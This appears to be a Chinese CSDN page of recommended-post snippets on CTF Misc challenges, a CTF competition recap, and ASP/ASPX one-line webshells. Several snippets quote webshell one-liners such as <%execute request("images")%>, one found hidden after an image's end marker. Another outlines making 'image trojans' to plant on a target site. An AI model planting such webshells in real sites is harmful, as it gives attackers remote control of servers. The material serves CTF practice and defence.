[黑盾]2020之Misc篇刷题记录(16)
Aluxian_的博客
09-14 484
NSSCTF之Misc篇刷题记录(16)
Stega_这是什么
weixin_34203832的博客
07-31 635
Notepad++查看,发现图片PS痕迹。其实是废话 属性查看为空 stegsolve一无所获 PICASA查看属性一无所获 16进制查看发现在结束标识符后还有数据: <%execute request("images")%> 这太扯了这不就是一句话木马吗 KEY提示说SHA1 。尝试加密。居然过了。 转载于:https://www.cnblogs.com/onerave...
一次真实的网络攻击取证纪实
chengfangang的专栏
12-29 3705
随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民 服务,银行和证券机构也都开始依托互联网来进行金融和股票交易,但是随着方便的同时也同时带来了新的 随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民 服务,
execute request("value")
Sunny
04-01 2558
http://hi.baidu.com/aoooog/blog/item/cb5e7c5406b7ba5c564e008d.html转这篇文章只是希望大家能够防御好,因为我的站点就是被这个东西害的对方首先上传图片木马,然后上传木马后门,直接在他的本地操作我的文件。与asp网站的安全性2008-10-18 12:07在ASP里有一句语句意思是执行省略号里的语句.那么如果我写进我们精心构造
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
Quantum Intelligence
08-04 5万+
首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为中间代码例如java .net  动态执行也就不存在
图片木马制作的三种方法
热门推荐
whatday的专栏
01-25 6万+
1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 2.Uedit32 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留
第五届黑盾总结
qq_35661990的博客
09-17 889
十天做了五题pwnable.kr的题目,结果比赛了才发现pwnable.kr上的前几题跟pwn常考的栈溢出、堆溢出没有关系。。。 pwnable.tw比较符合平常会出的pwn题。 最后只做出来了很简单的两个web两个杂项, 《无论你输入什么都是错的》的flag藏在用burp截取的返回报文的html项里。 《听说很漂亮》检查一下html代码,发现 把公式复制到python里(然后发现自...
福建闽盾 ctf比赛题目
08-26
而“闽盾”是指福建省网络安全协会举办的一项CTF比赛。我无法提供具体的题目,因为每届比赛的题目都不同,涵盖的领域也各有不同。根据以往比赛的经验,题目的类型可以包括密码学、网站漏洞、二进制安全、逆向工程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值